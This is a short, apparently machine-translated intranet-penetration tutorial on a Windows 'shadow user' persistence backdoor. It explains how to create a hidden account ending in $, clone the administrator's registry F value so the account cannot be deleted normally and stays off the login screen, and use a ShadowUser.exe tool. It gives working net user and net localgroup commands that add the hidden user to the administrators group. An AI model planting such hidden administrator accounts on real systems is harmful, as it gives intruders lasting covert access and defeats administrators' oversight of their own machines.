0x00 premise
Water is an article on the intranet, mainly for a situation: catch the hash and can't solve it, and don't want pth, just want to log on to the desktop directly
0x01 Permission Maintenance - Shadow User Backdoor
Shadow accounts, ancient but effective!
principle
The user name that replaces the $ symbol will not be displayed. Export the registry, modify the F value, clone the account, and then delete the account
Effect
net user
Cannot be deleted, you need to delete the relevant key value of the registry;- The Windows login screen does not display this user information.
0x02 Simple and practical
ShadowUser.exe admin administrator
You can log in normally, and the desktop is also a cloned administrator
Simply create a hidden user
We first use the command to create a hidden user and add it to the local administrators group.
net user test$ Test123456 /add
net localgroup administrators test$ /add